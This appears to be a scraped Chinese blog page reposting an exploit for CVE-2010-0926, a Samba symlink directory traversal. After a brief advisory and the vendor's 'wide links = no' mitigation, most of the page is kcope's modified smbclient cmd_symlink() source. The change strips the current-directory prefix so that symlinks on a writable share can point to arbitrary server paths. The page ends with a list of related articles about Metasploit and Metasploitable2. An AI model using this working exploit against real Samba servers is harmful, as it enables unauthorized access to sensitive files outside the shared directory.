linux samba 漏洞 exp,CVE-2010-0926 Samba smbd默认配置目录遍历漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...

最新推荐文章于 2024-04-02 13:37:07 发布
最新推荐文章于 2024-04-02 13:37:07 发布
阅读量388 收藏
点赞数
文章标签: linux samba 漏洞 exp

source: http://www.securityfocus.com/bid/38111/info

Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks.

To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts.

NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'.

smbclient patch (exploit):

samba-3.4.5/source3/client/client.c

/****************************************************************************

UNIX symlink.

****************************************************************************/

static int cmd_symlink(void)

{

TALLOC_CTX *ctx = talloc_tos();

char *oldname = NULL;

char *newname = NULL;

char *buf = NULL;

char *buf2 = NULL;

char *targetname = NULL;

struct cli_state *targetcli;

if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||

!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {

d_printf("symlink \n");

return 1;

}

oldname = talloc_asprintf(ctx,

"%s", // << HERE modified

buf);

if (!oldname) {

return 1;

}

newname = talloc_asprintf(ctx,

"%s", // << HERE modified

buf2);

if (!newname) {

return 1;

}

/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).

oldname = talloc_asprintf(ctx,

"%s%s", // < modified (see above)

client_get_cur_dir(), // < removed (see above)

buf);

if (!oldname) {

return 1;

}

newname = talloc_asprintf(ctx,

"%s%s", // < modified (see above)

client_get_cur_dir(), // < removed (see above)

buf2);

if (!newname) {

return 1;

}

----------------------------------------------*/

if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {

d_printf("link %s: %s\n", oldname, cli_errstr(cli));

return 1;

}

if (!SERVER_HAS_UNIX_CIFS(targetcli)) {

d_printf("Server doesn't support UNIX CIFS calls.\n");

return 1;

}

if (!cli_unix_symlink(targetcli, targetname, newname)) {

d_printf("%s symlinking files (%s -> %s)\n",

cli_errstr(targetcli), newname, targetname);

return 1;

}

return 0;

}

// Cheers,

// kcope

蜗牛小姐CC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cifs mount 挂载共享目录_Linux 上挂载 Samba(Windows & macOS 共享文件夹)的正确姿势...
weixin_39663605的博客
02-06 1483
一、操作环境服务器 1:Windows 7 家庭版的 PC服务器 2:macOS 10.12.4 的 MacBook Pro户端:CentOS 7.3.1611 已安装好 cifs-utils 软件包二、查看服务器共享出来的资源在 Linux 命令行界面中,必须手动指定共享出来的资源,不像 Windows 以及 macOS 可以自动列出。2.1 smbclient 命令用法smbclient -...
Metasploitable2靶机之第五篇--Samba sysmlink 默认配置目录遍历漏洞(CVE-2010-0926)
千寻的博客
04-02 1428
文章目录环境原理漏洞复现第一步 发现漏洞第二步 ,启动metasploit第三步选择漏洞库第四步 设置参数,开始攻击第五步 利用成功,打开共享目录注意 smbclient 报错:摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 漏洞复现 第一步 发现漏洞 第二步 ,启动metasploit msfconsole 第三步选择漏洞库 search samba use auxiliary
复现Samba sysmlink默认配置目录遍历漏洞
最新发布
NatusVincere
04-02 446
打开kali,输入msfconsole,进入msf控制台。提示输入密码,直接按下回车即可,这样就是使用匿名模式登录。第0个即为需要使用的漏洞,输入 use 0进行利用。输入show options 查看需要设置的参数。使用smbclient命令连接靶机的tmp文件夹。将下面两行粘贴到配置文件中[global]下面。打开metaspoitable2查看靶机IP。/smb.conf的global设置下添加。新建一个控制台窗口,输入命令修改配置文件。所以需要先在配置文件/etc/输入ls即可查看文件。
MSF以及Samba漏洞利用
zyh18851473527的博客
11-15 7011
文章目录MSF以及Samba漏洞利用一、Metasploit简介1.1MSF启动1.2问题报错1.2.1及时更新源1.2.2下载数据库二、Metasploit基础2.1专业术语2.2渗透攻击步骤三、主机扫描3.1使用辅助模块进行端口扫描3.1.1检查有哪些可用端口3.1.2一个小问题**3.1.3使用TCP扫描模块并检查有那些参数需要设置**3.1.4使用unset取消某个参数3.2使用辅助模块进行服务扫描3.3使用Nmap扫描3.3.1系统扫描四、漏洞利用4.1Metasploitable2搭建4.2 S
linux访问unix共享目录下,Linux/Unix访问Windows的共享文件夹
weixin_33363025的博客
04-29 162
#sudo smbmount //servername/sharedir /mnt/share -o username=xxx,password=xxxor# sudo mount -t smbfs -o username=tridge,password=foobar //fjall/test /data/testYou may come across the following problem:...
CVE-2017-7494:SAMBA CVE-2017-7494漏洞的远程根漏洞利用
05-06
CVE-2017-7494 SAMBA CVE-2017-7494漏洞的远程根漏洞利用。细节此漏洞利用分为两个部分: 首先,它编译一个称为“ implant.c”的有效负载,并生成一个库(libimplantx32.so或libimplantx64.so),该库更改为root用户...
LINUX-SAMBA服务配置.doc
11-29
SAMBA 安装配置需要安装多个软件包,包括 samba-common、samba-client、perl-Convert-ASN1、samba 和 xinetd。安装这些软件包可以使用 rpm 命令,例如: [root@rhel3 ~]# rpm -ivh /misc/cd/Server/samba-common-...
Linux运维-4.服务管理-005SAMBA-2视频-053 概述.avi
11-02
Linux运维-4.服务管理-005SAMBA-2视频-053 概述.avi
ansible-role-samba:Ansible角色-Samba
01-31
9. **版本控制**:从`ansible-role-samba-master`的文件名可以看出,这个角色可能是在Git仓库中维护的,并且可能是master分支的最新版本。使用版本控制可以跟踪角色的更改,便于团队协作和回溯问题。 10. **Ansible...
Linux下的文件共享服务器Samba安装文件及其配置说明 samba-4.14.5.tar
09-28
Linux环境中,Samba是一个非常重要的工具,它允许Linux系统与Windows系统之间进行文件和打印服务的共享。本文将详细讲解如何在CentOS系统上安装Samba 4.14.5并进行配置。 首先,我们需要了解Samba的核心概念。...
SMB漏洞
小锤队长的博客
10-06 1万+
目录 一,SMB信息泄露 充电站: 二,MS17-010 (永恒之蓝) 复现 一,SMB信息泄露 靶场:192.168.11.167 攻击机:kali 192.168.11.165 信息探测: nmap -sV 192.168.11.167 可以看到开放了,22 ssh端口,139,445的smb服务端口,以及3306的mysal服务 扫描更详细的信息: nmap -...
Metasploitable2 靶机漏洞(下)
Fly_鹏程万里
05-02 4725
11、Root用户弱口令漏洞(SSH爆破) 安全组织索引 CVE:无 OSVDB:无 BID:无 原理 靶机root用户存在弱口令漏洞,在使用指南里并没有指出。 影响系统/软件 Linux 使用工具 Metasploit 利用步骤 1.输入nmap –sV -O 192.168.160.131 查看SSh端口是否开启 开启metasploit framework 框...
漏洞验证】Metasploitable2靶机漏洞复现
weixin_43486390的博客
12-10 2552
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Bind Shell Backdoor Detection4、UnrealIRCd Backdoor(ircd) Metasploitable2靶机漏洞复现 环境IP:192.16...
Samba曝出7年漏洞 1行代码即可远程攻击
weixin_34228387的博客
07-03 140
目前安全研究人员发布公告称,发现Samba存在一个长达7年的漏洞,攻击者仅需一行程序代码就能远端执行恶意攻击。而2010年3月发行的Samba 3.5.0以上的版本都受这个编号为CVE-2017-7494的漏洞影响。所幸该漏洞已经被紧急修复了。   Samba曝出隐藏7年的漏洞 据悉,代号为HD Moore的安全研究人员在Twitter上指出,发现的S...
Metasploit靶机漏洞实践检验
热门推荐
Birldlee的博客
12-27 1万+
使用Metasploit渗透测试软件对Metasploitable靶机系统主机进行攻击,检验各种常见靶机漏洞的情况。
samba漏洞修复专题
波子汽水
03-02 3037
修复很简单升级到最新版的 不简单在如何升级查看系统默认Linux samba版本号 1. [root@localhost ~] whereis samba 2. samba: /etc/samba /usr/lib/samba /usr/share/man/man7/samba.7.gz 3. [root@localhost ~] rpm qa samba 4. samb
VMware漏洞实例分析之一 – 共享文件夹目录遍历漏洞
weixin_34242658的博客
08-13 142
标题:VMware漏洞实例分析之一 – 共享文件夹目录遍历漏洞作者:vxasm (mail: xasm2008@gmail.com)时间:2008-10-5一 名词定义Host机:运行VMware软件的真实主机;Guest机:装在VMware软件中的虚拟系统;后门:VMware有一套自己专有的“Backdoor I/O Port”指令,Host和Guest之间的所有数据都是通...
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1027
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
Talloc内存池介绍
qq_41688455的博客
11-30 2242
介绍 Talloc是一个层次结构的,包含引用计数和析构机制的内存池系统。它构建于标准C库上,定义了一组接口用以简化数据的申请和回收,尤其是对于那些包含了许多动态申请的元素(比如数组和字符串)的复杂数据结构尤为有效。 Talloc库的主要目标是:不必再为每一个复杂的数据结构都单独编写内存释放函数;为申请的内存块提供一个逻辑组织架构;减少长时间运行的应用程序中出现内存泄露的几率。所有这些都依靠在层次结...
"LINUX-SAMBA服务配置指南:实现跨系统文件共享
在进行LINUX-SAMBA服务配置之前,首先需要了解SAMBA的基本概念和作用。NFS只能实现Linux和Unix系统之间的文件共享,而CIFS只能实现Windows系统之间的文件共享。而SAMBA则可以实现不同主机、不同系统之间的文件共享。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值